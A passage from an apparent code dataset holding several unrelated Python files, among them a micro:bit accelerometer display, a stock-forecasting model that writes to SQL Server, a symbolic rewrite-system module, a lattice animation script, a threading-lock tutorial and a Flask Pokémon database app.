_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{
|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ab
cdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcde
fghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefgh
ijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijk
lmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmn
opqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopq
rstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrst
uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvw
xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABC
DEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEF
GHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHI
JKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
MNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO
PQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR
STUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
VWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
YZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123
456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%
&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'(
)*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+
,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD
"""
mystr=['leloluoipo','heloluxzipo', 'abcabcbb', 'a','basbarrabas', 'abcdefghijklmnopaqrstuvwxyz',' ', 'au', 'aab', new_str]
for st in mystr[:]:
print(f'For "{st}" the longest substring with no repeated '
f'characters is "{lengthOfLongestSubstring2(st)}"') |
24,191 | 89c0ca79f57472f0ba4dc0f7e62b7b179b8ff0bf | """
Show an acceleration on screen in binary.
Range seems to be -1024 to 1023.
Press A and B to cycle between X, Y and Z accelerations.
"""
from microbit import *
def show_binary(i):
dig = 1
img = Image(5, 5)
for y in range(5):
for x in range(5):
if dig & i:
val = 9
else:
val = 0
img.set_pixel(x, y, val)
dig <<= 1
display.show(img)
mode = 0
mode_change = True
while True:
# Update mode.
if button_a.was_pressed():
mode -= 1
mode_change = True
if button_b.was_pressed():
mode += 1
mode_change = True
if mode_change:
mode %= 3
if mode == 0:
val = 'x'
elif mode == 1:
val = 'y'
else:
val = 'z'
display.show(val)
sleep(1000)
# Decide and show value.
if mode == 0:
val = accelerometer.get_x()
elif mode == 1:
val = accelerometer.get_y()
else:
val = accelerometer.get_z()
show_binary(val)
mode_change = False
|
24,192 | b49a7927f889d1ec3a7888454d2ab6d410db78e3 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 16 16:26:07 2019
@author: WGP
"""
import xlrd, threading,datetime,os,pymssql,time
#os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
from queue import Queue, Empty
from threading import Thread
import WindTDFAPI as w
from keras import models,backend
import numpy as np
import pandas as pd
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
def calPercentile(xValue,arrPercentile,st=0): #len(arrPercentile)=100,upscane
isfind=False
abv=abs(xValue)
for i in range(st,100):
if abv<(arrPercentile[i]+0.00001):
isfind=True
break
if isfind:
result=i/100
else:
result=1
return result*np.sign(xValue)
def getNormInduData(xData,pclMatrix):
xShape=len(xData)
normInduData=np.zeros(xShape)
for j in range(xShape):
arrPercentile=pclMatrix[:,j]
normInduData[j]=calPercentile(xData[j],arrPercentile)
return normInduData
def btstr(btpara):
return str(btpara,encoding='utf-8')
def myLoss(y_true, y_pred):
#return backend.mean(backend.square((y_pred - y_true)*y_true), axis=-1)
return backend.mean(backend.abs((y_pred - y_true)*y_true), axis=-1)
def myMetric(y_true, y_pred):
return backend.mean(y_pred*y_true, axis=-1)*10
def getCfgFareFactor(ffPath):
cfgFile=os.path.join(ffPath,'cfgForeFactor.csv')
cfgData=tuple(map(btstr,np.loadtxt(cfgFile,dtype=bytes)))
return cfgData[:4],cfgData[4:]
def getTSAvgAmnt(pdAvgAmntFile):
global dictTSAvgAmnt,timeSpan
pdAvgAmnt=pd.read_csv(pdAvgAmntFile,header=0,index_col=0,engine='python')
for code in pdAvgAmnt.index:
dictTSAvgAmnt[code]=int(pdAvgAmnt.loc[code][0]/(14400/timeSpan))
def registerAllSymbol():
global dataVendor,listForeFactor
codelist={}
for ff in listForeFactor:
codelist=codelist|set(ff.dictCodeInfo.keys())
dataVendor.RegisterSymbol(codelist)
print('Register symbol, please wait...')
class EventManager:
def __init__(self):
self.__eventQueue = Queue()
self.__active = False
self.__thread = Thread(target = self.__Run)
self.__handlers = {}
def __Run(self):
while self.__active == True:
try:
event = self.__eventQueue.get(block = True, timeout = 1)
self.__EventProcess(event)
except Empty:
pass
def __EventProcess(self, event):
if event.type_ in self.__handlers:
for handler in self.__handlers[event.type_]:
handler(event)
def Start(self):
self.__active = True
self.__thread.start()
def AddEventListener(self, type_, handler):
try:
handlerList = self.__handlers[type_]
except KeyError:
handlerList = []
self.__handlers[type_] = handlerList
if handler not in handlerList:
handlerList.append(handler)
def SendEvent(self, event):
self.__eventQueue.put(event)
class MyEvent:
def __init__(self, Eventtype,Data):
self.type_ = Eventtype # 事件类型
self.data = Data # 字典用于保存具体的事件数据
class MSSQL:
def __init__(self,host,user,pwd,db):
self.host = host
self.user = user
self.pwd = pwd
self.db = db
def Connect(self):
try:
self.conn = pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset="UTF-8")
self.conn.autocommit(True)
self.cur = self.conn.cursor()
if not self.cur:
return False
else:
return True
except:
return False
def UpdateFF(self,sname,pm):
sql="update tblFundPricingParam set ff_1m_v=("+str(pm[0])+"),ff_2m_v=("+str(pm[1])+"),ff_3m_v=("+str(pm[2])+") where strategyName='"+sname+"'"
self.cur.execute(sql)
def UpdateAllFF(self):
global listForeFactor
listUpdate=[]
lsn=[]
for i in range(3):
listUpdate.append('ff_'+str(i+1)+'m_v=case strategyName')
for ff in listForeFactor:
for strategyName in ff.listStrategyName:
lsn.append('\''+strategyName+'\'')
for i in range(3):
listUpdate[i]+=' when \''+strategyName+'\' then '+str(ff.pm[i])
for i in range(3):
listUpdate[i]+=' end'
sql='update tblFundPricingParam set '+','.join(listUpdate)+' where strategyName in ('+','.join(lsn)+')'
self.cur.execute(sql)
def TDFCallBack(pMarketdata):
eventManager.SendEvent(MyEvent("quote",pMarketdata))
def MyNormData(normEvent):
global listForeFactor,lock,sql
isPush=normEvent.data
listPm=[]
intNTime=int(datetime.datetime.now().strftime('%H%M%S'))
if intNTime<91000 or intNTime>150000:
print('not trading time.')
return
lock.acquire()
try:
for ff in listForeFactor:
ff.CalPM()
listPm.append(ff.pm)
print(intNTime,*tuple(listPm))
if isPush and ((intNTime>93100 and intNTime<113000) or (intNTime>130100 and intNTime<150000)):
sql.UpdateAllFF()
finally:
lock.release()
def ReceiveQuote(quoteEvent):
global dictQuote,lock
dt =quoteEvent.data
lock.acquire()
try:
code=bytes.decode(dt.szWindCode)
dictQuote[code]=(dt.nTime/1000,dt.nMatch/10000,dt.iTurnover)
finally:
lock.release()
class ForeFactor:
def __init__(self, workPath,cfgFile):
self.workPath = workPath
self.cfgFile = cfgFile
self.dictCodeInfo = {}
self.nIndu=0
self.listModel=[]
self.listStrategyName=[]
self.pclMatrix=np.array([])
#output
self.lastInduData=np.array([])
self.inputData=np.array([])
self.pm=np.zeros(3)
self._getCfg()
def _getCfg(self):
global nXData,timeSpan
data = xlrd.open_workbook(os.path.join(self.workPath,self.cfgFile))
sheetCodeInfo = data.sheets()[0]
arrShares = sheetCodeInfo.col_values(1)[1:]
arrCode = sheetCodeInfo.col_values(0)[1:]
arrIndustry = sheetCodeInfo.col_values(2)[1:]
self.nIndu=len(set(arrIndustry))
self.inputData=np.zeros((nXData,self.nIndu*2))
for i in range(len(arrCode)):
self.dictCodeInfo[arrCode[i]]=[arrShares[i],arrIndustry[i]]
arrCfg=data.sheets()[1].col_values(1)
self.listStrategyName=arrCfg[10].split(',')
(filepath,tempfilename) = os.path.split(self.cfgFile)
(filename,extension) = os.path.splitext(tempfilename)
modelPath=os.path.join(self.workPath,filename)
testP=np.zeros((1,nXData,self.nIndu*2))
for i in range(3):
modelfile=os.path.join(modelPath,'model_'+filename+'_1min_'+str(i+1)+'min.h5')
model=models.load_model(modelfile,custom_objects={'myLoss': myLoss,'myMetric':myMetric})
model.predict(testP)
self.listModel.append(model)
self.pclMatrix=np.loadtxt(os.path.join(modelPath,'pclMatrix_'+filename+'.csv'),delimiter=',')
getTSAvgAmnt(os.path.join(modelPath,'avgAmnt_'+filename+'.csv'))
def CalPM(self):
global dictQuote,dictTSAvgAmnt,nXData
crow=np.zeros(self.nIndu*2)
inputRow=np.zeros(self.nIndu*2)
npAveTSpanAmnt=np.zeros(self.nIndu)
for (symbol,weiIndu) in self.dictCodeInfo.items():
if (symbol not in dictQuote):# or (symbol not in dictTSAvgAmnt):
#print('np Symbol: '+ symbol)
#return
continue
wei=weiIndu[0]
intIndu=int(weiIndu[1]+0.1)
lpri=dictQuote[symbol][1]
lamt=dictQuote[symbol][2]
crow[2*intIndu-2]+=wei*lpri
crow[2*intIndu-1]+=lamt
npAveTSpanAmnt[intIndu-1]+=dictTSAvgAmnt[symbol]
#if lpri<0.01:
#print('price 0: '+symbol)
#continue
if crow[0]<1:
print('wait quote')
return
if self.lastInduData.size==0:
self.lastInduData=crow
for i in range(self.nIndu):
inputRow[2*i]=(crow[2*i]/self.lastInduData[2*i]-1)*10000
inputRow[2*i+1]=(crow[2*i+1]-self.lastInduData[2*i+1])/npAveTSpanAmnt[i]
inputRow=getNormInduData(inputRow,self.pclMatrix)
self.inputData=np.vstack((self.inputData[1:,:],inputRow))
self.lastInduData=crow
for i in range(3):
self.pm[i]=self.listModel[i].predict(self.inputData.reshape(1,nXData,self.nIndu*2))[0,0]
#backend.clear_session()
self.pm=np.round(self.pm,2)
if __name__ == '__main__':
#global
eventManager = EventManager()
lock = threading.Lock()
listForeFactor=[]
dictQuote={}
dictTSAvgAmnt={}
timeSpan=3
nXData=20
#config
cfgPath='D:\\CalForeFactor\\HFI_Model'
if not os.path.exists(cfgPath):
cfgPath='C:\\Users\\WAP\\Documents\\HFI_Model'
cfgSQL,listCfgForeFactor=getCfgFareFactor(cfgPath)
fPath=os.path.join(cfgPath,'cfg')
for cfgFF in listCfgForeFactor:
listForeFactor.append(ForeFactor(fPath,cfgFF))
#SQL
sql=MSSQL(*cfgSQL)
nConnect=0
while not sql.Connect():
print('SQL Connet Error: ',nConnect)
nConnect+=1
time.sleep(5)
#Event
eventManager.AddEventListener("quote",ReceiveQuote)
eventManager.AddEventListener("normData",MyNormData)
eventManager.Start()
w.SetMarketDataCallBack(TDFCallBack)
dataVendor = w.WindMarketVendor("TDFConfig.ini", "TDFAPI25.dll")
nConnect=0
while (dataVendor.Reconnect() is False):
print("Error nConnect: ",nConnect)
nConnect+=1
time.sleep(5)
dataVendor.RegisterSymbol(set(dictTSAvgAmnt.keys()))
time.sleep(10)
for i in range(30):
eventManager.SendEvent(MyEvent("normData",False))
time.sleep(timeSpan)
while True:
eventManager.SendEvent(MyEvent("normData",True))
time.sleep(timeSpan)
|
24,193 | 0ceaf274327e33453ea093d48c5f960cfb51962e | """
Allows you to define sorts inductively.
In other words, constants and functions
under a sort class will have the sort
name associated with it.
"""
from copy import deepcopy
from typing import Dict, List, Optional
import functools
from symcollab.algebra import Constant, Function, FuncTerm, Sort, Term
from symcollab.rewrite import normal, RewriteRule, RewriteSystem
__all__ = ['Inductive', 'TheorySystem', 'system_from_sort']
class TheorySystem:
"""
Contains a sort and the
RewriteSystem that governs it.
"""
sort: Sort = None
rules: RewriteSystem = RewriteSystem()
definitions: Dict[Function, RewriteSystem] = dict()
@classmethod
def simplify(cls, x: Term, bound: int = -1) -> Optional[Term]:
"""
Simplify a term using the convergent
rewrite rules known.
"""
if not isinstance(x, FuncTerm):
raise ValueError("simplify function expects a FuncTerm.")
return normal(x, cls.rules, bound)[0]
@classmethod
def signature(cls) -> List[Term]:
"""List the signature of the system."""
el = []
for term in cls.__dict__.values():
if not isinstance(term, (Constant, Function)):
continue
el.append(deepcopy(term))
return el
@classmethod
def __len__(cls) -> int:
"""Return the number of elements."""
return len(filter(lambda x: isinstance(x, Constant)), cls.__dict__.values())
@classmethod
def add_rule(cls, rule: RewriteRule) -> None:
"""Add a rule to the system."""
if not isinstance(rule, RewriteRule):
raise ValueError(f"add_rule expected a RewriteRule not a '{type(rule)}'.")
cls.rules.append(rule)
@classmethod
def define(cls, function: Function, rules: RewriteSystem):
"""Define a function by a rewrite system."""
setattr(cls, function.symbol, function)
# TODO: Make sure RewriteSystem terminates
# TODO: Does composition of terminating rewrite systems terminate?
for rule in rules:
cls.add_rule(rule)
cls.definitions[function] = rules
def Inductive(cls=None):
"""
Decorator that takes a TheorySystem and
adds sorts to Constants and Functions defined.
"""
if cls is not None and not issubclass(cls, TheorySystem):
raise ValueError(
"Inductive decorator only works \
on classes that inherit TheorySystem."
)
@functools.wraps(cls)
def wrap(cls):
cls.sort = Sort(cls.__name__)
cls.rules = deepcopy(cls.rules)
cls.definitions = deepcopy(cls.definitions)
for name, term in cls.__dict__.items():
# Ignore private, already defined, and custom methods
if '_' in name \
or name in TheorySystem.__dict__ \
or (callable(term) and not isinstance(term, Function)):
continue
if isinstance(term, Constant):
if term.sort is not None and term.sort != cls.sort:
raise ValueError(
f"Constant {term} is of sort '{term.sort}' \
which is not the class name '{class_sort}'."
)
setattr(
cls,
name,
Constant(term.symbol, sort=cls.sort)
)
elif isinstance(term, Function):
if term.domain_sort is not None and term.domain_sort != cls.sort:
raise ValueError(
f"Function {term} has the domain sort \
set to '{term.domain_sort}' \
which is not the class name '{class_sort}'."
)
range_sort = cls.sort if term.range_sort is None else term.range_sort
setattr(
cls,
name,
Function(
term.symbol,
term.arity,
domain_sort=cls.sort,
range_sort=range_sort
)
)
else:
raise ValueError(
f"Variable '{name}' is of invalid type \
'{type(term)}' inside an inductive class. (Constant, Function)"
)
_system_sort_map[cls.sort] = cls
return cls
# Called as decorator
if cls is None:
return wrap
# Called as function
return wrap(cls)
_system_sort_map: Dict[Sort, TheorySystem] = dict()
def system_from_sort(s: Sort) -> Optional[TheorySystem]:
"""Obtain a TheorySystem from a sort."""
return _system_sort_map.get(s)
|
24,194 | 20330c6d4d43e63d902611aaf4680182a02111fd | in_str = 'Hello dear sir Adolfer Tannenbaum'
words = in_str.split()
words.reverse()
out_str = ' '.join(words)
print(out_str)
|
24,195 | f3c1620cc45ae7948f0c23cea2ed0ac88907ce39 | import numpy as np
import matplotlib.pyplot as plt
import os
import rpmClass_Stable as rpm
import pandas as pd
import time
import matplotlib.cm as cm
from importlib import reload
reload(rpm)
from matplotlib.animation import FuncAnimation, FFMpegWriter
# Some global variables to define the whole run
total_number_of_frames = 100
total_width_of_sine_wave = 2 * np.pi
all_x_data = np.linspace(0, total_width_of_sine_wave, total_number_of_frames)
all_y_data = np.sin(all_x_data)
start = time.time()
def animate(frame, line):
"""
Animation function. Takes the current frame number (to select the potion of
data to plot) and a line object to update.
"""
# Not strictly neccessary, just so we know we are stealing these from
# the global scope
global all_x_data, all_y_data
# We want up-to and _including_ the frame'th element
current_x_data = all_x_data[: frame + 1]
current_y_data = all_y_data[: frame + 1]
line.set_xdata(current_x_data)
line.set_ydata(current_y_data)
# This comma is necessary!
return (line,)
'''
folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
#filenames = os.listdir(folder)
filenames = []
for f in os.listdir(folder):
if f.endswith(".npz"):
filenames.append(os.path.join(folder, f))
filenames.sort(key=lambda s: os.path.getmtime(s))
print(filenames)
L = rpm.ASI_RPM(1,1)
L.load(filenames[0])
lattice_update = L.returnLattice()
X = lattice_update[:,:,0]
Y = lattice_update[:,:,1]
Mx = lattice_update[:,:,3]
My = lattice_update[:,:,4]
fig, ax = plt.subplots(1,1)
lattice = ax.quiver(X, Y, Mx, My,Mx+My, pivot ='mid')
LHistory = pd.read_csv(os.path.join(folder, 'LatticeHistory.csv'), header = None)
print(LHistory)
xpos_flip = [x for x in LHistory[9].values if x != -1]
ypos_flip = [x for x in LHistory[10].values if x != -1]
print(xpos_flip, ypos_flip)
'''
def animateSSF(frame, lattice1, L, xpos_flip, ypos_flip):
xpos = xpos_flip[frame]
ypos = ypos_flip[frame]
#print(xpos, ypos)
L.flipSpin(int(xpos), int(ypos))
L.vertexCharge2()
L_update = L.returnLattice()
Mx = L_update[:,:,3]
My = L_update[:,:,4]
#Mx[np.where(L_update[:,:,6]==0)] = np.nan
#My[np.where(L_update[:,:,6]==0)] = np.nan
lattice1.set_UVC(Mx, My, Mx+My)
#X = L_update[:,:,0]
#Y = L_update[:,:,1]
#Charge = L_update[:,:, 8].flatten()
#print(np.shape((X, Y)))
#lattice2.set_offsets((X, Y))
#print
#lattice2.set_array(Charge)
return(lattice1)
def animateRPM(frame, lattice, filename):
#L = rpm.ASI_RPM(1,1)
#print(frame, filename[frame])
L.load(filename[frame])
lattice_update = L.returnLattice()
Mx = lattice_update[:,:,3].flatten()
My = lattice_update[:,:,4].flatten()
X[np.where(Hc==0)] = -1
#Mx[np.where(lattice_update[:,:,6]==0)] = np.nan
#My[np.where(lattice_update[:,:,6]==0)] = np.nan
lattice.set_UVC(Mx, My, Mx+My)
X = lattice_update[:,:,0].flatten()
Y = lattice_update[:,:,1].flatten()
Charge = lattice_update[:,:, 8].flatten()
print(np.shape(np.hstack((X, Y))))
lattice.set_offsets(np.vstack((X, Y)))
#print
lattice.set_array(Charge)
return lattice,
def estimateTime(frames):
time_est = frames*0.11143+0.83739
print('Estimated time to export to mp4: ',time_est/60 ,' minutes')
def animateMono(frame, monopoles, L, xpos_flip, ypos_flip):
lattice_update = L.returnLattice()
L.vertexCharge2()
X = lattice_update[:,:,0].flatten()
Y = lattice_update[:,:,1].flatten()
Charge = lattice_update[:,:, 8].flatten()
print(np.shape(np.hstack((X, Y))))
monopoles.set_offsets(np.hstack((X, Y)))
#print
monopoles.set_array(Charge)
#Mx = lattice_update[:,:,3]
#My = lattice_update[:,:,4]
#Mx[np.where(lattice_update[:,:,6]==0)] = np.nan
#My[np.where(lattice_update[:,:,6]==0)] = np.nan
#lattice.set_UVC(Mx, My, Mx+My)
return monopoles,
'''
folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
#filenames = os.listdir(folder)
print(len(xpos_flip))
estimateTime(len(xpos_flip))
fig.tight_layout()
anim =FuncAnimation(fig, animateSSF,frames = 1, fargs=(lattice,L, xpos_flip, ypos_flip),
interval=40, blit=False, repeat = False) #len(folder)
writer = FFMpegWriter(fps=25, bitrate=None)
anim.save(os.path.join(folder,"out_funcanimationSSF_2.mp4"), writer = writer)
plt.close('all')
end = time.time()
print(end-start)
'''
def makeAnimation(folder):
start = time.time()
print('Exporting to mp4 started: ', time.localtime(start))
#folder = 'D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.030000e-01_count2'
#filenames = os.listdir(folder)
filenames = []
for f in os.listdir(folder):
if f.endswith(".npz"):
filenames.append(os.path.join(folder, f))
filenames.sort(key=lambda s: os.path.getmtime(s))
print(filenames)
L = rpm.ASI_RPM(1,1)
L.load(filenames[0])
lattice_update = L.returnLattice()
X = lattice_update[:,:,0].flatten()
Y = lattice_update[:,:,1].flatten()
Mx = lattice_update[:,:,3].flatten()
My = lattice_update[:,:,4].flatten()
Charge = lattice_update[:,:,8].flatten()
Hc = lattice_update[:,:,6].flatten()
X[np.where(Hc==0)] = -1
fig, ax = plt.subplots(1,1)
plt.set_cmap(cm.jet)
lattice1 = ax.quiver(X, Y, Mx, My,Mx+My, pivot ='mid', cmap ='bwr', zorder = 1)
ax.set_xlim([-1*L.returnUCLen(), np.max(X)+L.returnUCLen()])
ax.set_ylim([-1*L.returnUCLen(), np.max(X)+L.returnUCLen()])
#lattice2 = ax.scatter(X, Y, s=25,c=Charge, marker = 'o', zorder=2, vmax = 1, vmin = -1, cmap = 'RdBu')
LHistory = pd.read_csv(os.path.join(folder, 'LatticeHistory.csv'), header = None)
#print(LHistory)
xpos_flip = [x for x in LHistory[9].values if x != -1]
ypos_flip = [x for x in LHistory[10].values if x != -1]
estimateTime(len(ypos_flip))
fig.tight_layout()
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
left=False, # ticks along the bottom edge are off
right=False, # ticks along the top edge are offlen(xpos_flip)
labelleft=False) # labels along the bottom edge are offlen(xpos_flip)
anim = FuncAnimation(fig, animateSSF,frames = len(xpos_flip), fargs=(lattice1,L, xpos_flip, ypos_flip),
interval=40, blit=False, repeat = False) #len(folder)
#anim = FuncAnimation(fig, animateMono, frames = 10, fargs = (lattice,L, xpos_flip, ypos_flip),
# interval = 40, blit = False, repeat = False)
writer = FFMpegWriter(fps=25, bitrate=None)
outfolder = r'D:\RPM_Rapid\SquareQDvHapp2\Movies'
#D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD1.000000e-01_Happ1.000000e-01_count1
savename = folder[28:]
anim.save(os.path.join(outfolder,savename+".mp4"), writer = writer)
plt.close('all')
end = time.time()
print('How long it took: ', end-start)
#print(xpos_flip, ypos_flip)
makeAnimation('D:\RPM_Rapid\SquareQDvHapp2\SquarePD_QD5.000000e-02_Happ1.200000e-01_count19')
'''
testfolder = r'D:\RPM_Rapid\SquareQDvHapp2'
for directory in os.listdir(testfolder):
if 'count2' in directory and 'Progression' not in directory:
folder = os.path.join(testfolder,directory)
print(folder)
makeAnimation(folder)
'''
'''
fig.tight_layout()
anim =FuncAnimation(fig, animateRPM,frames = len(filenames), fargs=(lattice, filenames),
interval=1000, blit=False, repeat = False)
anim.save(os.path.join(folder,"out_funcanimation3.mp4"))
plt.close('all')
'''
'''
# Now we can do the plotting!
fig, ax = plt.subplots(1)
# Initialise our line
line, = ax.plot([0], [0])
# Have to set these otherwise we will get one ugly plot!
ax.set_xlim(0, total_width_of_sine_wave)
ax.set_ylim(-1.2, 1.2)
ax.set_xlabel("$x$")
ax.set_ylabel("$\sin(x)$")
# Make me pretty
fig.tight_layout()
animation = FuncAnimation(
# Your Matplotlib Figure object
fig,
# The function that does the updating of the Figure
animate,
# Frame information (here just frame number)
np.arange(total_number_of_frames),
# Extra arguments to the animate function
fargs=[line],
# Frame-time in ms; i.e. for a given frame-rate x, 1000/x
interval=1000 / 25
)
folder = os.getcwd()
animation.save(os.path.join(folder,"out_funcanimation.mp4"))
''' |
24,196 | de1351af53b03b8c28db4172dad76f17529cb686 | #Synchronizing Threads
''' The threading module provided with Python includes a simple-to-implement locking
mechanism that allows you to synchronize threads. A new lock includes
created by calling the Lock() method,which returns the new clock.
The acquire(blocking) method of the new lock object is
used to force the threads to run synchronously. The optional
blocking parameter enables you to control whether the thread waits to
acquire the lock.
If blocking is set to 0, the thread returns immediately with a 0 value if the lock
cannot be acquired and with a 1 if the lock was acquired. If blocking is set to 1,
the thread blocks and wait for the lock to be released.
The release() method of the new lock object is used to release the lock when it is no longer
required.
'''
import threading
import time
class myThread(threading.Thread):
def __init__(self,threadID,name,counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
print ("Starting " + self.name)
#Get lock to synchronize threads
threadLock.acquire()
print_time(self.name,self.counter,3)
# Free lock to release next thread
threadLock.release()
def print_time(threadName,delay,counter):
while counter:
time.sleep(delay)
print("%s: %s" % (threadName,time.ctime(time.time())))
counter -=1
threadLock = threading.Lock()
threads = []
thread1 = myThread(1,"Thread-1",1)
thread2 = myThread(2,"Thread-2",2)
thread1.start()
thread2.start()
'''
threads.append(thread1)
threads.append(thread2)
for t in threads:
t.join()
'''
print("Exiting Main Thread") |
24,197 | 865ae526c68a98d63981193ad188e44e2a6346b3 | from flask import Flask
from flask import render_template, redirect,request,flash,url_for
from flask_wtf import FlaskForm
from wtforms import StringField , SubmitField, IntegerField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
import pymysql
import secrets
import os
from sqlalchemy import or_
dbuser=os.environ.get('DBUSER')
dbpass=os.environ.get('DBPASS')
dbhost=os.environ.get('DBHOST')
dbname=os.environ.get('DBNAME')
#conn="mysql+pymysql://{0}:{1}@{2}/{3}".format(secrets.dbuser,secrets.dbpass,secrets.dbhost,secrets.dbname)
conn="mysql+pymysql://{0}:{1}@{2}/{3}".format(dbuser,dbpass,dbhost,dbname)
app = Flask(__name__)
app.config['SECRET_KEY']='SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'] = conn
db=SQLAlchemy(app)
class ysun95_pokemonindex(db.Model):
InstanceID = db.Column(db.Integer,primary_key=True)
national_index=db.Column(db.String(255))
pokemon_name=db.Column(db.String(255))
generation=db.Column(db.String(255))
def __repr__(self):
return "InstanceID: {0} | national_index: {1} | pokemon_name: {2} | generation: {3}".format(self.InstanceID,self.national_index,self.pokemon_name,self.generation)
class Pokemonindex(FlaskForm):
InstanceID=IntegerField('InstanceID :')
national_index=StringField('National index number:',validators=[DataRequired()])
pokemon_name=StringField('name:',validators=[DataRequired()])
generation=StringField('Generation:',validators=[DataRequired()])
@app.route('/')
def index():
all_pokemons=ysun95_pokemonindex.query.all()
return render_template('index.html',pokemontable=all_pokemons,pageTitle='Sun\'s favourite pokemons')
@app.route('/search',methods=['GET','POST'])
def search():
if request.method=="POST":
form=request.form
search_value=form['search_string']
search="%{}%".format(search_value)
results=ysun95_pokemonindex.query.filter(or_(ysun95_pokemonindex.pokemon_name.like(search),
ysun95_pokemonindex.national_index.like(search),
ysun95_pokemonindex.generation.like(search))).all()
return render_template('index.html',pokemontable=results,pageTitle="Sun's Pokemon index",legend="Search results")
else:
return redirect('/')
@app.route('/pokemonindex',methods=['GET','POST'])
def pokemonindex():
form=Pokemonindex()
if form.validate_on_submit():
pokemon=ysun95_pokemonindex(national_index=form.national_index.data,pokemon_name=form.pokemon_name.data,generation=form.generation.data)
db.session.add(pokemon)
db.session.commit()
return redirect('/')
return render_template('pokemonindex.html',form=form,pageTitle='Add pokemons')
@app.route('/delete_pokemon/<int:InstanceID>',methods=['GET','POST'])
